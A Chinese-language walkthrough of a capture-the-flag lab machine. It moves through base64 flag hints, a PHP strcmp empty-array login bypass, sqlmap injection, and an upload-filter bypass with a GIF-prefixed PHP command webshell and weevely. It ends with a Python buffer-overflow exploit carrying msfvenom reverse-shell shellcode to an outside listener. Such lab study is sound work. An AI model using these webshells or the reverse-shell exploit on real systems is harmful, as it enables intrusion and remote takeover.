写在前面
看作者描述,这台靶机每个flag都有通向下个flag的提示,因此要多思考作者留下的线索。
信息收集
探测靶机IPnetdiiscover
确定靶机IP为:192.168.1.107
查看靶机开启服务:nmap -sS -sV -T5 192.168.1.107
发现只开启了http服务
枚举
打开首页是这样子的
只有三个页面,逐个页面查看网页源代码,在contact.php里发现flag1
找到flag1{YWxsdGhlZmlsZXM=}
flag里面的值看起来像是base64,解出来一看,发现真的是base64加密,解密为:
allthefiles
直译就是全部文件,到底是什么意思,也纠结了挺久,后来继续查看网页源代码,发现这三个文件的名字有点可疑
文件名字看上去都是密文,拼接到一起后的完整密文为:
ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==
base64解密后:
找到flag2{aW1mYWRtaW5pc3RyYXRvcg==}
flag2里面的值,解密以后是字符串:
imfadministrator
看上去像是一个目录,浏览器打开为:
看上去像是需要爆破这个登录信息。
随便输入admin:123456,提示了两个信息
invalid username,直接告诉我们用户名是错误的,也就是说我们可以先爆破看看有什么用户名
I couldn't get the SQL working, so I hard-coded the password. It's still mad secure through. - Roger
hard-coded the password就是把密码直接写在了代码里,不经过数据库,也就是说不用考虑sql注入
关于用户名,在contact.php这个页面里已经给出了几个待选的账号
这里我们至少可以做一个用户字典,包括:
Roger S. Michaels
rmichaels@imf.local
rmichaels
Alexander B. Keith
akeith@imf.local
akeith
Elizabeth R. Stone
estone@imf.local
estone
由于字典数目不多,我们大可手动测试,最后测试rmichaels这个用户名返回的值跟其他几个账号都不一样
现在我们可以确定这个后台的一个账号为:rmichaels
一般这种时候就用burpsuite了,事实上我一开始也是这个思路,爆破了一个多小时以后,我依然没有得到密码,这个时候我就想会不会思路错了。一般而言,这些靶机如果想考你爆破,常规字典最多十几分钟就能跑出来了,跑这么久密码还没出来那应该不是考爆破。吐槽一下,打靶机以来我就没用过burpsuite成功爆破过后台的。。。
这里我卡了蛮久,后来还是看了大佬的提示,原来pass字段传一个空数组能爆出flag3
我他妈。。。
找到flag3{Y29udGludWVUT2Ntcw==}
解出来是:continueTOcms
回到页面继续cms操作,点击IMF CMS
进去发现只有三个页面,查看源码没发现有什么特别的东西,于是尝试修改get参数,发现好像有注入点
把burpsuite里的http访问内容保存成一个文件
用sqlmap尝试注入,发现果然可以注入
sqlmap -r imf.txt -p "pagename" --dbms=mysql --batch --level=3 --risk=3 --random-agent
打开admin数据库里的pages表,发现一个可疑的文件
sqlmap -r imf.txt -p "pagename" --dbms=mysql --batch --random-agent --technique B -D admin -T pages --dump
打开这个图片的链接,发现是一个二维码,简书不可以贴二维码,就不贴图了
路径:http://192.168.1.107/imfadministrator/images/whiteboard.jpg
用手机微信扫一下,得到flag4
找到flag4{dXBsb2Fkcjk0Mi5waHA=}、
密文解出来是:uploadr942.php
在url打开这个文件,发现一个上传点:
尝试上传一个图片文件,发现回显了一个字符串
经过验证是上传后的文件名
到这里思路就很明显了,上传一个webshell,绕过上传验证即可。(uploads这个文件夹可通过目录爆破得到,或者自己猜出来,这里不赘叙)
燃鹅,这个上传限制,不但限制了文件类型,文件后缀还有一个waf会检测文件的内容是否有特殊的php函数,比较坑爹。这里还是要参考大佬的绕过方法,这个方法我在upload lab里没有遇到过,算是边学边练了。
构造一个文件:
GIF
<?php
$c = $_GET[c];
echo `$c`;
?>
第一行的GIF是为了绕过内容限制
然后把文件名字改成.gif结尾,就可以像php文件一样执行,我猜这应该是利用了apache的某个文件解析漏洞?
上传以后根据回显的文件名,在url里访问:
c后面的参数可以执行任意命令,遍历uploads里面的文件,拿到flag5
找到flag5{YWdlbnRzZXJ2aWNlcw==}
flag5解出来是:agentservices
虽然可以在url上直接运行命令,但是还是比较难使用的,我们需要有一个webshell,可以用weevely生成一个
weevely generate pass shell.php
pass是连接的密码,shell.php是生成的木马文件名字。由于靶机只能接收jpg/png/gif等格式的文件上传,所以我们这里需要把生成的木马文件改为gif后缀,以及在第一行添加GIF字样以绕过靶机的文件内容限制。
上传完成,拿到生成的文件名字,用weevely连接靶机
weevely http://192.168.3.150/imfadministrator/uploads/da380a0441c6.gif pass
上面的命令第一个参数是木马地址,第二个参数是连接密码,我们拿到一个webshell
因为flag5提示我们留意agentservice服务,用netstat -ant
查看本机服务
可以看到本地监听了一个7788端口,应该就是对应的agent服务
我们用whereis agent查看agent安装在哪个位置
去到/usr/local/bin/目录,发现有两个文件,查看access_code,显示
SYN 7482,8279,9467
上面信息收集的时候用nmap没有探测到7788这个端口,需要用konck敲开
把靶机上的agent文件下载到本地,执行
file_download /usr/local/bin/agent /root/agent
file命令查看文件,确认agent是ELF32位文件,这一步主要是下面生成shellcode的时候需要知道靶机是x86还是x64
给agent文件提权,尝试执行
提示Invalid Agent ID,那么也就是需要找到一个正确的Agent ID
用ltrace命令跟踪进程调用库函数,fgets函数输入任意值(可试多几次),每次均显示strncmp("任意值\n", "48093572", 8)这行代码,看意思应该是拿我们的输入跟48093572这个值比对,如果不正确就返回Invalid Agent ID。那么也就是说48093572就是我们需要的agentid
用得到的agentid尝试执行agent程序,果然返回了操作menu
这里其实考察的是缓冲区溢出,我们用msfvenom来编译一个shellcode
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.3.67 LPORT=6666 -f python -b "\x00\x0a\x0b"
把上面显示的buf复制粘贴到下面的python代码中:
import socket
# Target related variables
remotehost = "192.168.3.150"
remoteport = 7788
menuoption = 3
agentid = 48093572
# Default recv size
recvsize = 512
# Connnect to remote host
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((remotehost, remoteport))
client.recv(recvsize)
client.send("{0}\n".format(agentid))
client.recv(recvsize)
client.send("{0}\n".format(menuoption))
client.recv(recvsize)
# Payload genereated by Msfvenom, to be force fed into reporting tool
buf = b""
buf += b"\xd9\xc8\xd9\x74\x24\xf4\x5f\xbb\xdd\x1b\x6a\x46\x29"
buf += b"\xc9\xb1\x12\x83\xef\xfc\x31\x5f\x13\x03\x82\x08\x88"
buf += b"\xb3\x0d\xf4\xbb\xdf\x3e\x49\x17\x4a\xc2\xc4\x76\x3a"
buf += b"\xa4\x1b\xf8\xa8\x71\x14\xc6\x03\x01\x1d\x40\x65\x69"
buf += b"\x5e\x1a\x96\x2a\x36\x59\x99\xb6\xcc\xd4\x78\x76\xb6"
buf += b"\xb6\x2b\x25\x84\x34\x45\x28\x27\xba\x07\xc2\xd6\x94"
buf += b"\xd4\x7a\x4f\xc4\x35\x18\xe6\x93\xa9\x8e\xab\x2a\xcc"
buf += b"\x9e\x47\xe0\x8f"
# Buffer is too small to trigger overflow. Fattening it up!
# 168 is the offset I found using pattern_offset
buf += "A" * (168 - len(buf))
# EAX call I made note of earlier in this segment
buf += "\x63\x85\x04\x08\n"
# And off we go!
client.send(buf)
在kali开启一个监听,输入:nc -lvp 6666
执行上面的python代码,成功得到一个root shell
拿到flag6{R2gwc3RQcm90MGMwbHM=}
总结
非常精彩的靶机,涵盖了很多知识点,难怪作者希望做的人能过learn something。
我目前还没有学到缓冲区溢出,这台算是找了找感觉,后面要好好学习一下这块。
上传限制绕过那里应该是利用apache的文件解析漏洞,如果我理解错了,请不吝赐教。
后面回查了上传限制的代码,果然用了白名单,那当然比黑名单限制就安全的多,下次再遇到这种情况,可以参考文件解析这个思路。。。
关于爆破密码,回看了靶机的源代码,密码设置的非常的长,可以说是不可能被爆破
每一次请求都sleep了3秒,注释也是说不要尝试爆破。下次如果十几分钟还没爆出密码来赶紧换思路。。。。
在密码比较判断的时候,用了strcmp函数,strcmp的方法是比较传入的两个字符串,第一个参数是源串,第二个参数是比较的字符串,如果相等则返回0。然而这是理想的结果,由于php是弱类型语言,而传进来的pass也没有任何的校验,当pass的值是一个空数组时依然会返回比对成功,也算是php的一个坑。